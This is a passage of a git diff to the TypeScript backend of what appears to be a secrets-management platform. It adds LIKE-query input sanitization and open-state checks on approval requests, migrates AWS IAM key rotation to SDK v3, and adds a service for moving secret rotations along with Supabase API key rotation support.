ilike ?`, [ + db.ref("email").withSchema("committerUser"), + `%${sanitizeSqlLikeString(search)}%` + ]) + .orWhereILike(`${TableName.Environment}.name`, `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike(`${TableName.Environment}.slug`, `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike(`${TableName.SecretApprovalPolicy}.secretPath`, `%${sanitizeSqlLikeString(search)}%`); }); } @@ -739,15 +746,15 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => { .whereRaw(`CONCAT_WS(' ', ??, ??) ilike ?`, [ db.ref("committerUserFirstName"), db.ref("committerUserLastName"), - `%${search}%` + `%${sanitizeSqlLikeString(search)}%` ]) - .orWhereRaw(`?? ilike ?`, [db.ref("committerUserUsername"), `%${search}%`]) - .orWhereRaw(`?? ilike ?`, [db.ref("committerUserEmail"), `%${search}%`]) - .orWhereILike(`environmentName`, `%${search}%`) - .orWhereILike(`environment`, `%${search}%`) - .orWhereILike(`policySecretPath`, `%${search}%`) - .orWhereILike(`requestFolderPath`, `%${search}%`) - .orWhereILike(`secretKey`, `%${search}%`); + .orWhereRaw(`?? ilike ?`, [db.ref("committerUserUsername"), `%${sanitizeSqlLikeString(search)}%`]) + .orWhereRaw(`?? 
ilike ?`, [db.ref("committerUserEmail"), `%${sanitizeSqlLikeString(search)}%`]) + .orWhereILike(`environmentName`, `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike(`environment`, `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike(`policySecretPath`, `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike(`requestFolderPath`, `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike(`secretKey`, `%${sanitizeSqlLikeString(search)}%`); }); } diff --git a/backend/src/ee/services/secret-approval-request/secret-approval-request-fns.ts b/backend/src/ee/services/secret-approval-request/secret-approval-request-fns.ts index c169fad5e0c..211ef029849 100644 --- a/backend/src/ee/services/secret-approval-request/secret-approval-request-fns.ts +++ b/backend/src/ee/services/secret-approval-request/secret-approval-request-fns.ts @@ -37,7 +37,7 @@ export const sendApprovalEmailsFn = async ({ type: NotificationType.SECRET_CHANGE_REQUEST, title: "Secret Change Request", body: `You have a new secret change request pending your review for the project **${project.name}** in the organization **${project.organization.name}**.`, - link: `/organizations/${project.orgId}/projects/secret-management/${project.id}/approval` + link: `/organizations/${project.orgId}/projects/secret-management/${project.id}/approval?requestId=${secretApprovalRequest.id}` })) ); @@ -51,7 +51,7 @@ export const sendApprovalEmailsFn = async ({ firstName: reviewerUser.firstName, projectName: project.name, organizationName: project.organization.name, - approvalUrl: `${cfg.SITE_URL}/organizations/${project.orgId}/projects/secret-management/${project.id}/approval` + approvalUrl: `${cfg.SITE_URL}/organizations/${project.orgId}/projects/secret-management/${project.id}/approval?requestId=${secretApprovalRequest.id}` }, template: SmtpTemplates.SecretApprovalRequestNeedsReview }); diff --git a/backend/src/ee/services/secret-approval-request/secret-approval-request-service.ts 
b/backend/src/ee/services/secret-approval-request/secret-approval-request-service.ts index bc40ea8db56..7ba9465372b 100644 --- a/backend/src/ee/services/secret-approval-request/secret-approval-request-service.ts +++ b/backend/src/ee/services/secret-approval-request/secret-approval-request-service.ts @@ -20,6 +20,8 @@ import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/ import { groupBy, pick, unique } from "@app/lib/fn"; import { setKnexStringValue } from "@app/lib/knex"; import { alphaNumericNanoId } from "@app/lib/nanoid"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { EnforcementLevel } from "@app/lib/types"; import { triggerWorkflowIntegrationNotification } from "@app/lib/workflow-integrations/trigger-notification"; import { TriggerFeature } from "@app/lib/workflow-integrations/types"; @@ -479,12 +481,6 @@ export const secretApprovalRequestServiceFactory = ({ actorAuthMethod, actorOrgId }: TReviewRequestDTO) => { - const secretApprovalRequest = await secretApprovalRequestDAL.findById(approvalId); - if (!secretApprovalRequest) { - throw new NotFoundError({ message: `Secret approval request with ID '${approvalId}' not found` }); - } - if (actor !== ActorType.USER) throw new BadRequestError({ message: "Must be a user" }); - const plan = await licenseService.getPlan(actorOrgId); if (!plan.secretApproval) { throw new BadRequestError({ @@ -493,6 +489,15 @@ export const secretApprovalRequestServiceFactory = ({ }); } + const secretApprovalRequest = await secretApprovalRequestDAL.findById(approvalId); + if (!secretApprovalRequest) { + throw new NotFoundError({ message: `Secret approval request with ID '${approvalId}' not found` }); + } + if (actor !== ActorType.USER) throw new BadRequestError({ message: "Must be a user" }); + + if (secretApprovalRequest.status !== RequestState.Open) + throw new BadRequestError({ message: "You can only 
review open approval requests" }); + const { policy } = secretApprovalRequest; if (policy.deletedAt) { throw new BadRequestError({ @@ -637,6 +642,10 @@ export const secretApprovalRequestServiceFactory = ({ }); } + if (secretApprovalRequest.hasMerged) throw new BadRequestError({ message: "Approval request has been merged" }); + if (secretApprovalRequest.status !== RequestState.Open) + throw new BadRequestError({ message: "You can only approve or reject open approval requests" }); + const { hasRole } = await permissionService.getProjectPermission({ actor: ActorType.USER, actorId, @@ -708,21 +717,27 @@ export const secretApprovalRequestServiceFactory = ({ if (secretUpdationCommits.length) { const secrets = await secretV2BridgeDAL.findBySecretKeys( folderId, - secretCreationCommits.map((el) => ({ + secretUpdationCommits.map((el) => ({ key: el.key, type: SecretType.Shared })) ); - const updationConflictSecretsGroupByKey = groupBy(secrets, (i) => i.key); + const updationSecretsGroupByKey = groupBy(secrets, (i) => i.key); secretUpdationCommits - .filter(({ key, secretId }) => updationConflictSecretsGroupByKey[key] || !secretId) + .filter(({ key, secretId }) => { + const dbSecret = updationSecretsGroupByKey[key]?.[0]; + // Conflict if: secret doesn't exist OR secretId doesn't match (was recreated) OR no secretId in commit + return !dbSecret || dbSecret.id !== secretId || !secretId; + }) .forEach((el) => { conflicts.push({ op: SecretOperations.Update, secretId: el.id }); }); - secretUpdationCommits = secretUpdationCommits.filter( - ({ key, secretId }) => Boolean(secretId) && !updationConflictSecretsGroupByKey[key] - ); + secretUpdationCommits = secretUpdationCommits.filter(({ key, secretId }) => { + const dbSecret = updationSecretsGroupByKey[key]?.[0]; + // Valid if: secret exists AND secretId matches AND has secretId + return dbSecret && dbSecret.id === secretId && Boolean(secretId); + }); } const secretDeletionCommits = secretApprovalSecrets.filter(({ op }) => op === 
SecretOperations.Delete); @@ -1630,7 +1645,9 @@ export const secretApprovalRequestServiceFactory = ({ const cfg = getConfig(); const approvalUrl = `${cfg.SITE_URL}${approvalPath}?requestId=${secretApprovalRequest.id}`; - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); await triggerWorkflowIntegrationNotification({ input: { projectId, diff --git a/backend/src/ee/services/secret-replication/secret-replication-service.ts b/backend/src/ee/services/secret-replication/secret-replication-service.ts index 21a56343a02..8e7212597d7 100644 --- a/backend/src/ee/services/secret-replication/secret-replication-service.ts +++ b/backend/src/ee/services/secret-replication/secret-replication-service.ts @@ -2,7 +2,7 @@ import { SecretType, TSecrets, TSecretsV2 } from "@app/db/schemas"; import { TSecretApprovalPolicyServiceFactory } from "@app/ee/services/secret-approval-policy/secret-approval-policy-service"; import { TSecretApprovalRequestDALFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-dal"; import { TSecretApprovalRequestSecretDALFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-secret-dal"; -import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography"; import { NotFoundError } from "@app/lib/errors"; import { groupBy, unique } from "@app/lib/fn"; @@ -93,7 +93,6 @@ type TSecretReplicationServiceFactoryDep = { }; export type TSecretReplicationServiceFactory = ReturnType; -const SECRET_IMPORT_SUCCESS_LOCK = 10; const keystoreReplicationSuccessKey = (jobId: string, secretImportId: string) => `${jobId}-${secretImportId}`; const getReplicationKeyLockPrefix = (projectId: string, environmentSlug: string, secretPath: 
string) => @@ -577,7 +576,7 @@ export const secretReplicationServiceFactory = ({ // this is used to avoid multiple times generating secret approval by failed one await keyStore.setItemWithExpiry( keystoreReplicationSuccessKey(job.id as string, destinationSecretImport.id), - SECRET_IMPORT_SUCCESS_LOCK, + KeyStoreTtls.SecretReplicationSuccessInSeconds, 1, KeyStorePrefixes.SecretReplication ); @@ -863,7 +862,7 @@ export const secretReplicationServiceFactory = ({ // this is used to avoid multiple times generating secret approval by failed one await keyStore.setItemWithExpiry( keystoreReplicationSuccessKey(job.id as string, destinationSecretImport.id), - SECRET_IMPORT_SUCCESS_LOCK, + KeyStoreTtls.SecretReplicationSuccessInSeconds, 1, KeyStorePrefixes.SecretReplication ); diff --git a/backend/src/ee/services/secret-rotation-v2/aws-iam-user-secret/aws-iam-user-secret-rotation-fns.ts b/backend/src/ee/services/secret-rotation-v2/aws-iam-user-secret/aws-iam-user-secret-rotation-fns.ts index d581cb5b9a6..b4782a240fc 100644 --- a/backend/src/ee/services/secret-rotation-v2/aws-iam-user-secret/aws-iam-user-secret-rotation-fns.ts +++ b/backend/src/ee/services/secret-rotation-v2/aws-iam-user-secret/aws-iam-user-secret-rotation-fns.ts @@ -1,4 +1,10 @@ -import IAM from "aws-sdk/clients/iam.js"; +import { + type AccessKeyMetadata, + CreateAccessKeyCommand, + DeleteAccessKeyCommand, + IAMClient, + ListAccessKeysCommand +} from "@aws-sdk/client-iam"; import { TAwsIamUserSecretRotationGeneratedCredentials, @@ -13,7 +19,7 @@ import { } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-types"; import { getAwsConnectionConfig } from "@app/services/app-connection/aws"; -const getCreateDate = (key: IAM.AccessKeyMetadata): number => { +const getCreateDate = (key: AccessKeyMetadata): number => { return key.CreateDate ? 
new Date(key.CreateDate).getTime() : 0; }; @@ -28,10 +34,10 @@ export const awsIamUserSecretRotationFactory: TRotationFactory< } = secretRotation; const $rotateClientSecret = async () => { - const { credentials } = await getAwsConnectionConfig(connection, region); - const iam = new IAM({ credentials }); + const { credentials, region: resolvedRegion } = await getAwsConnectionConfig(connection, region); + const iam = new IAMClient({ credentials, region: resolvedRegion }); - const { AccessKeyMetadata } = await iam.listAccessKeys({ UserName: userName }).promise(); + const { AccessKeyMetadata } = await iam.send(new ListAccessKeysCommand({ UserName: userName })); if (AccessKeyMetadata && AccessKeyMetadata.length > 0) { // Sort keys by creation date (oldest first) @@ -41,21 +47,21 @@ export const awsIamUserSecretRotationFactory: TRotationFactory< if (sortedKeys.length >= 2) { const accessId = sortedKeys[0].AccessKeyId || sortedKeys[1].AccessKeyId; if (accessId) { - await iam - .deleteAccessKey({ + await iam.send( + new DeleteAccessKeyCommand({ UserName: userName, AccessKeyId: accessId }) - .promise(); + ); } } } - const { AccessKey } = await iam.createAccessKey({ UserName: userName }).promise(); + const { AccessKey } = await iam.send(new CreateAccessKeyCommand({ UserName: userName })); return { - accessKeyId: AccessKey.AccessKeyId, - secretAccessKey: AccessKey.SecretAccessKey + accessKeyId: AccessKey?.AccessKeyId ?? "", + secretAccessKey: AccessKey?.SecretAccessKey ?? 
"" }; }; @@ -71,17 +77,17 @@ export const awsIamUserSecretRotationFactory: TRotationFactory< generatedCredentials, callback ) => { - const { credentials } = await getAwsConnectionConfig(connection, region); - const iam = new IAM({ credentials }); + const { credentials, region: resolvedRegion } = await getAwsConnectionConfig(connection, region); + const iam = new IAMClient({ credentials, region: resolvedRegion }); await Promise.all( generatedCredentials.map((generatedCredential) => - iam - .deleteAccessKey({ + iam.send( + new DeleteAccessKeyCommand({ UserName: userName, AccessKeyId: generatedCredential.accessKeyId }) - .promise() + ) ) ); diff --git a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-dal.ts b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-dal.ts index 4ef50038ccd..77bd7e69ac3 100644 --- a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-dal.ts +++ b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-dal.ts @@ -4,6 +4,7 @@ import { TDbClient } from "@app/db"; import { TableName } from "@app/db/schemas"; import { TSecretRotationsV2 } from "@app/db/schemas/secret-rotations-v2"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { buildFindFilter, ormify, @@ -198,10 +199,11 @@ export const secretRotationV2DALFactory = ( .countDistinct(`${TableName.SecretRotationV2}.name`); if (search) { + const sanitizedSearch = sanitizeSqlLikeString(search); void query.where((qb) => { void qb - .whereILike(`${TableName.SecretV2}.key`, `%${search}%`) - .orWhereILike(`${TableName.SecretRotationV2}.name`, `%${search}%`); + .whereILike(`${TableName.SecretV2}.key`, `%${sanitizedSearch}%`) + .orWhereILike(`${TableName.SecretRotationV2}.name`, `%${sanitizedSearch}%`); }); } @@ -265,10 +267,11 @@ export const secretRotationV2DALFactory = ( ); if (search) { + const sanitizedSearch = sanitizeSqlLikeString(search); void subquery.where((qb) => { void qb - 
.whereILike(`${TableName.SecretV2}.key`, `%${search}%`) - .orWhereILike(`${TableName.SecretRotationV2}.name`, `%${search}%`); + .whereILike(`${TableName.SecretV2}.key`, `%${sanitizedSearch}%`) + .orWhereILike(`${TableName.SecretRotationV2}.name`, `%${sanitizedSearch}%`); }); } @@ -469,6 +472,88 @@ export const secretRotationV2DALFactory = ( } }; + const findByProjectAndDateRange = async ( + { + projectId, + startDate, + endDate + }: { + projectId: string; + startDate: Date; + endDate: Date; + }, + tx?: Knex + ) => { + try { + const query = (tx || db.replicaNode())(TableName.SecretRotationV2) + .join(TableName.SecretFolder, `${TableName.SecretRotationV2}.folderId`, `${TableName.SecretFolder}.id`) + .join(TableName.Environment, `${TableName.SecretFolder}.envId`, `${TableName.Environment}.id`) + .join(TableName.AppConnection, `${TableName.SecretRotationV2}.connectionId`, `${TableName.AppConnection}.id`) + .join( + TableName.SecretRotationV2SecretMapping, + `${TableName.SecretRotationV2SecretMapping}.rotationId`, + `${TableName.SecretRotationV2}.id` + ) + .join(TableName.SecretV2, `${TableName.SecretV2}.id`, `${TableName.SecretRotationV2SecretMapping}.secretId`) + .where(`${TableName.Environment}.projectId`, projectId) + .whereNotNull(`${TableName.SecretRotationV2}.nextRotationAt`); + + const rawRotations = await query + .whereBetween(`${TableName.SecretRotationV2}.nextRotationAt`, [startDate, endDate]) + .select( + selectAllTableCols(TableName.SecretRotationV2), + db.ref("name").withSchema(TableName.Environment).as("envName"), + db.ref("id").withSchema(TableName.Environment).as("envId"), + db.ref("slug").withSchema(TableName.Environment).as("envSlug"), + db.ref("id").withSchema(TableName.AppConnection).as("connectionAppId"), + db.ref("key").withSchema(TableName.SecretV2).as("secretKey"), + db.ref("id").withSchema(TableName.SecretV2).as("secretId") + ); + + if (!rawRotations.length) return []; + + const foldersWithPath = await folderDAL.findSecretPathByFolderIds( + 
projectId, + rawRotations.map((r) => r.folderId), + tx + ); + + const folderRecord: Record = {}; + foldersWithPath.forEach((folder) => { + if (folder) folderRecord[folder.id] = folder; + }); + + return sqlNestRelationships({ + data: rawRotations, + key: "id", + parentMapper: (rotation) => ({ + id: rotation.id, + name: rotation.name, + type: rotation.type, + nextRotationAt: rotation.nextRotationAt, + rotationInterval: rotation.rotationInterval, + rotationStatus: rotation.rotationStatus, + isAutoRotationEnabled: rotation.isAutoRotationEnabled, + environment: { slug: rotation.envSlug, name: rotation.envName, id: rotation.envId }, + folder: { + id: rotation.folderId, + path: folderRecord[rotation.folderId]?.path ?? "/" + }, + connection: { id: rotation.connectionAppId } + }), + childrenMapper: [ + { + key: "secretKey", + label: "secretKeys" as const, + mapper: ({ secretKey }) => secretKey + } + ] + }); + } catch (error) { + throw new DatabaseError({ error, name: "Find Calendar Rotations - Secret Rotation V2" }); + } + }; + const findSecretRotationsToQueue = async (rotateBy: Date, tx?: Knex) => { const secretRotations = await (tx || db.replicaNode())(TableName.SecretRotationV2) .where(`${TableName.SecretRotationV2}.isAutoRotationEnabled`, true) @@ -479,6 +564,73 @@ export const secretRotationV2DALFactory = ( return secretRotations; }; + const findByProject = async (projectId: string, tx?: Knex) => { + try { + const rawRotations = await (tx || db.replicaNode())(TableName.SecretRotationV2) + .join(TableName.SecretFolder, `${TableName.SecretRotationV2}.folderId`, `${TableName.SecretFolder}.id`) + .join(TableName.Environment, `${TableName.SecretFolder}.envId`, `${TableName.Environment}.id`) + .join(TableName.AppConnection, `${TableName.SecretRotationV2}.connectionId`, `${TableName.AppConnection}.id`) + .join( + TableName.SecretRotationV2SecretMapping, + `${TableName.SecretRotationV2SecretMapping}.rotationId`, + `${TableName.SecretRotationV2}.id` + ) + 
.join(TableName.SecretV2, `${TableName.SecretV2}.id`, `${TableName.SecretRotationV2SecretMapping}.secretId`) + .where(`${TableName.Environment}.projectId`, projectId) + .select( + selectAllTableCols(TableName.SecretRotationV2), + db.ref("name").withSchema(TableName.Environment).as("envName"), + db.ref("id").withSchema(TableName.Environment).as("envId"), + db.ref("slug").withSchema(TableName.Environment).as("envSlug"), + db.ref("id").withSchema(TableName.AppConnection).as("connectionAppId"), + db.ref("key").withSchema(TableName.SecretV2).as("secretKey"), + db.ref("id").withSchema(TableName.SecretV2).as("secretId") + ); + + if (!rawRotations.length) return []; + + const foldersWithPath = await folderDAL.findSecretPathByFolderIds( + projectId, + rawRotations.map((r) => r.folderId), + tx + ); + + const folderRecord: Record = {}; + foldersWithPath.forEach((folder) => { + if (folder) folderRecord[folder.id] = folder; + }); + + return sqlNestRelationships({ + data: rawRotations, + key: "id", + parentMapper: (rotation) => ({ + id: rotation.id, + name: rotation.name, + type: rotation.type, + nextRotationAt: rotation.nextRotationAt, + rotationInterval: rotation.rotationInterval, + rotationStatus: rotation.rotationStatus, + isAutoRotationEnabled: rotation.isAutoRotationEnabled, + environment: { slug: rotation.envSlug, name: rotation.envName, id: rotation.envId }, + folder: { + id: rotation.folderId, + path: folderRecord[rotation.folderId]?.path ?? 
"/" + }, + connection: { id: rotation.connectionAppId } + }), + childrenMapper: [ + { + key: "secretKey", + label: "secretKeys" as const, + mapper: ({ secretKey }) => secretKey + } + ] + }); + } catch (error) { + throw new DatabaseError({ error, name: "Find by Project - Secret Rotation V2" }); + } + }; + return { ...secretRotationV2Orm, find, @@ -490,6 +642,8 @@ export const secretRotationV2DALFactory = ( insertSecretMappings: secretRotationV2SecretMappingOrm.insertMany, findWithMappedSecrets, findWithMappedSecretsCount, + findByProjectAndDateRange, + findByProject, findSecretRotationsToQueue }; }; diff --git a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-enums.ts b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-enums.ts index 968c61a27b5..4643531cc87 100644 --- a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-enums.ts +++ b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-enums.ts @@ -15,7 +15,8 @@ export enum SecretRotation { DbtServiceToken = "dbt-service-token", WindowsLocalAccount = "windows-local-account", OpenRouterApiKey = "open-router-api-key", - HpIloLocalAccount = "hp-ilo-local-account" + HpIloLocalAccount = "hp-ilo-local-account", + SupabaseApiKey = "supabase-api-key" } export enum SecretRotationStatus { diff --git a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-fns.ts b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-fns.ts index c5950d9b29b..3a47fa50b25 100644 --- a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-fns.ts +++ b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-fns.ts @@ -32,6 +32,7 @@ import { TSecretRotationV2Raw, TUpdateSecretRotationV2DTO } from "./secret-rotation-v2-types"; +import { SUPABASE_API_KEY_ROTATION_LIST_OPTION, TSupabaseApiKeyRotation } from "./supabase-api-key"; import { TUnixLinuxLocalAccountRotation, UNIX_LINUX_LOCAL_ACCOUNT_ROTATION_LIST_OPTION @@ -58,7 +59,8 @@ const SECRET_ROTATION_LIST_OPTIONS: Record 
{ @@ -359,6 +361,17 @@ export const throwOnImmutableParameterUpdate = ( throw new BadRequestError({ message: "Cannot update rotation method or username" }); } break; + case SecretRotation.SupabaseApiKey: + if ( + haveUnequalProperties( + updatePayload.parameters as TSupabaseApiKeyRotation["parameters"], + secretRotation.parameters as TSupabaseApiKeyRotation["parameters"], + ["projectRef", "keyType"] + ) + ) { + throw new BadRequestError({ message: "Cannot update project reference or key type" }); + } + break; default: // do nothing } diff --git a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-maps.ts b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-maps.ts index 15572f274b9..ca22e153cce 100644 --- a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-maps.ts +++ b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-maps.ts @@ -18,7 +18,8 @@ export const SECRET_ROTATION_NAME_MAP: Record = { [SecretRotation.DbtServiceToken]: "DBT Service Token", [SecretRotation.WindowsLocalAccount]: "Windows Local Account", [SecretRotation.OpenRouterApiKey]: "OpenRouter API Key", - [SecretRotation.HpIloLocalAccount]: "HP iLO Local Account" + [SecretRotation.HpIloLocalAccount]: "HP iLO Local Account", + [SecretRotation.SupabaseApiKey]: "Supabase API Key" }; export const SECRET_ROTATION_CONNECTION_MAP: Record = { @@ -38,5 +39,6 @@ export const SECRET_ROTATION_CONNECTION_MAP: Record; auditLogService: Pick; keyStore: Pick; - folderDAL: Pick; + folderDAL: Pick< + TSecretFolderDALFactory, + "findBySecretPath" | "findBySecretPathMultiEnv" | "findSecretPathByFolderIds" + >; secretV2BridgeDAL: Pick< TSecretV2BridgeDALFactory, - "bulkUpdate" | "insertMany" | "deleteMany" | "upsertSecretReferences" | "find" | "invalidateSecretCacheByProjectId" + | "bulkUpdate" + | "insertMany" + | "deleteMany" + | "upsertSecretReferences" + | "find" + | "findOne" + | "updateById" + | "findReferencedSecretReferencesBySecretKey" + | 
"updateSecretReferenceEnvAndPath" + | "invalidateSecretCacheByProjectId" >; - secretVersionV2BridgeDAL: Pick; + secretVersionV2BridgeDAL: Pick; secretVersionTagV2BridgeDAL: Pick; resourceMetadataDAL: Pick; secretTagDAL: Pick; @@ -170,7 +185,8 @@ const SECRET_ROTATION_FACTORY_MAP: Record + secretV2BridgeDAL.find( + { + $in: { + [`${TableName.SecretV2}.key` as "key"]: secretKeys + }, + [`${TableName.SecretV2}.folderId` as "folderId"]: folderId, + [`${TableName.SecretV2}.type` as "type"]: SecretType.Shared + }, + tx ? { tx } : undefined + ); + const $throwOnConflictingSecrets = async ({ secretKeys, folderId, @@ -234,16 +270,7 @@ export const secretRotationV2ServiceFactory = ({ }); } - const conflictingSecrets = await secretV2BridgeDAL.find( - { - $in: { - [`${TableName.SecretV2}.key` as "key"]: secretKeys - }, - [`${TableName.SecretV2}.folderId` as "folderId"]: folderId, - [`${TableName.SecretV2}.type` as "type"]: SecretType.Shared - }, - tx ? { tx } : undefined - ); + const conflictingSecrets = await $findConflictingSecrets({ secretKeys, folderId, tx }); if (conflictingSecrets.length) { throw new BadRequestError({ @@ -926,6 +953,200 @@ export const secretRotationV2ServiceFactory = ({ return expandSecretRotation(secretRotation, kmsService); }; + const moveSecretRotation = async ( + { type, rotationId, destinationEnvironment, destinationSecretPath, overwriteDestination }: TMoveSecretRotationV2DTO, + actor: OrgServiceActor + ) => { + const plan = await licenseService.getPlan(actor.orgId); + + if (!plan.secretRotation) + throw new BadRequestError({ + message: "Failed to move secret rotation due to plan restriction. Upgrade plan to manage secret rotations." 
+ }); + + const secretRotation = await secretRotationV2DAL.findById(rotationId); + + if (!secretRotation) + throw new NotFoundError({ + message: `Could not find ${SECRET_ROTATION_NAME_MAP[type]} Rotation with ID "${rotationId}"` + }); + + const { projectId, folderId: sourceFolderId, secretsMapping, folder, environment, connection } = secretRotation; + + if (connection.app !== SECRET_ROTATION_CONNECTION_MAP[type]) + throw new BadRequestError({ + message: `Secret Rotation with ID "${rotationId}" is not configured for ${SECRET_ROTATION_NAME_MAP[type]}` + }); + + const isRotationOccurring = Boolean(await keyStore.getItem(KeyStorePrefixes.SecretRotationLock(secretRotation.id))); + + if (isRotationOccurring) + throw new BadRequestError({ + message: "A rotation is currently in progress for this secret rotation. Please try again shortly." + }); + + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorId: actor.id, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + actionProjectType: ActionProjectType.SecretManager, + projectId + }); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionSecretRotationActions.Delete, + getSecretRotationSubject(secretRotation) + ); + + const destinationFolder = await folderDAL.findBySecretPath( + projectId, + destinationEnvironment, + destinationSecretPath + ); + + if (!destinationFolder) + throw new NotFoundError({ + message: `Destination folder with path "${destinationSecretPath}" in environment "${destinationEnvironment}" not found` + }); + + if (destinationFolder.id === sourceFolderId) + throw new BadRequestError({ + message: "Source and destination locations are the same" + }); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionSecretRotationActions.Create, + getSecretRotationSubject(secretRotation, { + environment: destinationEnvironment, + secretPath: destinationSecretPath + }) + ); + + const mappedKeys = Object.values(secretsMapping as 
TSecretRotationV2["secretsMapping"]); + + const { encryptor: secretManagerEncryptor, decryptor: secretManagerDecryptor } = + await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.SecretManager, + projectId + }); + + const updatedRotation = await secretRotationV2DAL.transaction(async (tx) => { + const conflictingRotation = await secretRotationV2DAL.findOne({ + name: secretRotation.name, + folderId: destinationFolder.id + }); + + if (conflictingRotation) + throw new BadRequestError({ + message: `A Secret Rotation with the name "${secretRotation.name}" already exists at the secret path "${destinationSecretPath}"` + }); + + const conflictingDestinationSecrets = await $findConflictingSecrets({ + secretKeys: mappedKeys, + folderId: destinationFolder.id + }); + + if (conflictingDestinationSecrets.length && !overwriteDestination) { + throw new BadRequestError({ + message: `The following secrets already exist at the destination path "${destinationSecretPath}": ${conflictingDestinationSecrets + .map(({ key }) => key) + .join(", ")}. 
Set "overwriteDestination" to true to replace them.` + }); + } + + if (conflictingDestinationSecrets.length && overwriteDestination) { + await secretV2BridgeDAL.deleteMany( + conflictingDestinationSecrets.map((s) => ({ key: s.key, type: SecretType.Shared })), + destinationFolder.id, + actor.id, + tx + ); + } + + const sourceSecrets = await secretV2BridgeDAL.find( + { + $in: { + [`${TableName.SecretV2}.key` as "key"]: mappedKeys + }, + [`${TableName.SecretV2}.folderId` as "folderId"]: sourceFolderId, + [`${TableName.SecretV2}.type` as "type"]: SecretType.Shared + }, + { tx } + ); + + if (sourceSecrets.length) { + await tx(TableName.SecretV2) + .whereIn( + "id", + sourceSecrets.map((s) => s.id) + ) + .update({ folderId: destinationFolder.id }); + + await secretVersionV2BridgeDAL.update( + { + $in: { + secretId: sourceSecrets.map((s) => s.id) + } + }, + { folderId: destinationFolder.id }, + tx + ); + + for await (const secret of sourceSecrets) { + await fnUpdateMovedSecretReferences({ + orgId: actor.orgId, + projectId, + sourceEnvironment: environment.slug, + sourceSecretPath: folder.path, + sourceFolderId, + destinationEnvironment, + destinationSecretPath, + destinationFolderId: destinationFolder.id, + secretKey: secret.key, + secretId: secret.id, + secretDAL: secretV2BridgeDAL, + secretVersionDAL: secretVersionV2BridgeDAL, + folderCommitService, + folderDAL, + secretQueueService, + encryptor: ({ plainText }) => secretManagerEncryptor({ plainText }), + decryptor: ({ cipherTextBlob }) => secretManagerDecryptor({ cipherTextBlob }), + tx + }); + } + } + + return secretRotationV2DAL.updateById(rotationId, { folderId: destinationFolder.id }, tx); + }); + + await secretV2BridgeDAL.invalidateSecretCacheByProjectId(projectId); + + await snapshotService.performSnapshot(destinationFolder.id); + await secretQueueService.syncSecrets({ + orgId: connection.orgId, + secretPath: destinationSecretPath, + projectId, + environmentSlug: destinationEnvironment, + excludeReplication: true 
+ }); + + await snapshotService.performSnapshot(sourceFolderId); + await secretQueueService.syncSecrets({ + orgId: connection.orgId, + secretPath: folder.path, + projectId, + environmentSlug: environment.slug, + excludeReplication: true + }); + + return { + secretRotation: await expandSecretRotation(updatedRotation, kmsService), + sourceEnvironment: environment.slug, + sourceSecretPath: folder.path + }; + }; + const triggerFailedWebhook = async ( projectId: string, environment: { slug: string; name: string; id: string }, @@ -1474,7 +1695,7 @@ export const secretRotationV2ServiceFactory = ({ { projectId, $search: { - name: `%${search}%` + name: search }, $in: { folderId: permissiveFolderMappings.map(({ folderId }) => folderId) @@ -1684,6 +1905,7 @@ export const secretRotationV2ServiceFactory = ({ findSecretRotationById, findSecretRotationByName, deleteSecretRotation, + moveSecretRotation, findSecretRotationGeneratedCredentialsById, rotateSecretRotation, rotateGeneratedCredentials, diff --git a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-types.ts b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-types.ts index 028aa39d76d..e9a67ff84a8 100644 --- a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-types.ts +++ b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-types.ts @@ -109,6 +109,13 @@ import { } from "./redis-credentials/redis-credentials-rotation-types"; import { TSecretRotationV2DALFactory } from "./secret-rotation-v2-dal"; import { SecretRotation } from "./secret-rotation-v2-enums"; +import { + TSupabaseApiKeyRotation, + TSupabaseApiKeyRotationGeneratedCredentials, + TSupabaseApiKeyRotationInput, + TSupabaseApiKeyRotationListItem, + TSupabaseApiKeyRotationWithConnection +} from "./supabase-api-key"; import { TUnixLinuxLocalAccountRotation, TUnixLinuxLocalAccountRotationGeneratedCredentials, @@ -141,7 +148,8 @@ export type TSecretRotationV2 = | 